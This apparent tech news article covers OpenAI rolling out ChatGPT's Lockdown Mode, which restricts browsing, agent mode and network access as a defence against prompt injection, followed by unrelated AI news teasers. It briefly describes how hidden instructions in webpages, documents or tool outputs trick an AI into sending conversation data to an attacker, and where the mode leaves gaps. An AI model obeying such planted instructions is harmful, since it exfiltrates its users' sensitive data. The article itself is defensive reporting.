ChatGPT Security
OpenAI's Lockdown Mode Locks Down ChatGPT Against Prompt Injection Attacks
OpenAI is rolling out Lockdown Mode to all ChatGPT users, an optional security setting that disables live web browsing, deep research, and agent mode to block prompt injection attacks that try to exfiltrate sensitive data. The move signals that connected AI agents are creating attack surfaces that even frontier labs are racing to contain.
What Lockdown Mode Actually Does
OpenAI is expanding its Lockdown Mode security feature to all ChatGPT users, including Free, Go, Plus, and Pro accounts, as well as self‑serve Business accounts, according to Neowin. The feature was first introduced in February for enterprise plans but is now reaching a much wider audience.
When Lockdown Mode is enabled, it places hard limits on how ChatGPT interacts with external systems. Live web browsing is restricted to cached content only — no new network requests leave OpenAI's network. Deep Research is disabled entirely. Agent Mode, which can autonomously take actions, is turned off. Canvas‑generated code cannot access the network. ChatGPT also stops downloading files for data analysis, though manually uploaded files continue to work, TechCrunch reported.
"Lockdown Mode is not intended for everyone," OpenAI stated. "It is designed for people and organizations that handle sensitive data and want stricter protection from data exfiltration risks related to prompt injection."
The Attack Vector: Prompt Injection as Data Theft
Prompt injection is essentially social engineering for AI. An attacker hides malicious instructions inside a webpage, document, or tool output that the AI reads, tricking it into leaking sensitive conversation data to an external server. As AI agents gain the ability to browse the web, read emails, and execute code, the attack surface expands dramatically.
Lockdown Mode does not block prompt injections from entering ChatGPT's context. A malicious instruction could still appear in cached browsing content or an uploaded file, OpenAI acknowledged. Instead, the mode focuses on the exfiltration side — it blocks the outbound network requests that would allow an attacker to actually receive the stolen data.
This is part of a "defense‑in‑depth approach," OpenAI said. "As ChatGPT becomes more capable and connected, we're continuing to add practical protections that give users more choice over how ChatGPT works with sensitive information and connected features."
What Gets Disabled: The Full List
The feature disables or constrains several key ChatGPT capabilities:
- Live Web Browsing Restricted to cached content only — search results may be stale or unavailable
- Deep Research Disabled entirely — both standard deep research and shopping research
- Agent Mode Disabled — ChatGPT cannot autonomously take multi‑step actions
- Canvas Networking Code generated in Canvas cannot access the network
- Image Retrieval ChatGPT cannot display images in responses or fetch them from the web
- File Downloads ChatGPT cannot download files for analysis, though manual uploads still work
Who Gets It and How It Rolls Out
>The rollout to personal accounts marks a significant expansion. Previously, Lockdown Mode was only available to enterprise customers through workspace admin controls. Now individual users can toggle it on from Settings Security, according to Neowin.
Enterprise admins retain role‑based access controls — they can create custom roles and assign Lockdown Mode to specific users, such as executives or security team members who face elevated targeting risk. Alongside Lockdown Mode, OpenAI is also rolling out an Active Sessions feature that lets users see where their account is signed in across devices, adding another layer of visibility per OpenAI's help center.
What Lockdown Mode Doesn't Cover
The protection is deliberately narrow. "Lockdown Mode does not affect memory, file uploads, or the ability to share conversations," SecurityBrief Australia noted. It also does not restrict network access in Codex, OpenAI's coding agent, which operates under a different set of controls.
Connected apps — including MCP servers and third‑party connectors — present a separate exposure surface that Lockdown Mode doesn't directly address. Instead, OpenAI groups app actions by risk level: read actions in trusted apps are categorized as "Medium risk," while write actions are classified as higher risk because they create observable side effects. OpenAI does not recommend read or write actions to untrusted apps for Lockdown Mode users.
For builders working with sensitive data, this means Lockdown Mode is a useful layer — but it's not a complete security solution. Prompt injections can still alter model behavior. The mode is about containment, not prevention.
The Bigger Picture: Securing the Connected Agent
The Lockdown Mode rollout arrives as AI agents are becoming more autonomous and more dangerous when compromised. OpenAI's own Codex can browse the web and execute code. Anthropic's Claude has an agent mode that operates across files and terminals. As these tools gain network access and the ability to take irreversible actions, prompt injection stops being an academic concern and becomes a real attack vector.
OpenAI is also standardizing "Elevated Risk" labels across ChatGPT, ChatGPT Atlas, and Codex, flagging features that carry additional security exposure. In Codex, for example, granting network access now comes with an explicit risk label and explanation of what changes, SecurityBrief reported.
The tension is clear: the most powerful AI features — web browsing, agent autonomy, tool use — are also the most dangerous when exploited. Lockdown Mode is OpenAI's acknowledgment that security can't just be added at the model level. It needs to live at the product level too.
Sources
- 1.Neowin(neowin.net)
- 2.TechCrunch(techcrunch.com)
- 3.SecurityBrief(securitybrief.com.au)
Jun 7, 2026
Apollo and Blackstone Lock In $35B Chip Deal to Fuel Anthropic's AI Expansion
Apollo Global Management and Blackstone have finalized a $35 billion debt financing package to buy Google TPU chips for Anthropic, in what ranks among the largest private credit transactions ever assembled. Broadcom is backstopping the senior notes, creating a new blueprint for AI infrastructure financing.
Jun 7, 2026
xAI Trained Its Coding Models on Claude Outputs for Months Before Getting Cut Off
Elon Musk's xAI spent months distilling Anthropic's Claude to train its own coding models, continuing through personal accounts even after Anthropic revoked official access in January 2026. The revelation, reported by The Information, raises fresh questions about model distillation and the data supply chain behind AI coding tools.
Related News
Jun 6, 2026
Trump Admin Discusses Taking U.S. Government Equity Stake in OpenAI
The Trump administration and OpenAI are in talks about the U.S. government receiving donated equity in the AI giant to seed a 'Public Wealth Fund' that would distribute AI profits to American citizens. The discussions, ongoing for over a year, signal a potential reshaping of how the government partners with frontier AI companies — with rival Anthropic notably excluded from the conversation.
Jun 6, 2026
Tesla's Own FSD Trainers Don't Trust the Tech They Built
A Reuters investigation reveals that 7 of 9 former Tesla data labelers who trained Full Self-Driving would not trust it to drive them, citing dangerous failures they observed firsthand. Eleven independent researchers found Tesla's safety statistics inflate FSD's safety record by up to 3x through flawed methodology — comparing airbag-deployment crashes against far less severe incidents.
Jun 6, 2026
S&P 500 Blocks SpaceX, OpenAI, and Anthropic from Fast-Track Entry
S&P Global has rejected proposed rule changes that would have let SpaceX, OpenAI, and Anthropic enter the S&P 500 quickly after their IPOs. The profitability requirement stays, and SpaceX's $4.94 billion 2025 loss means no fast track to $7.5 trillion in passive index funds.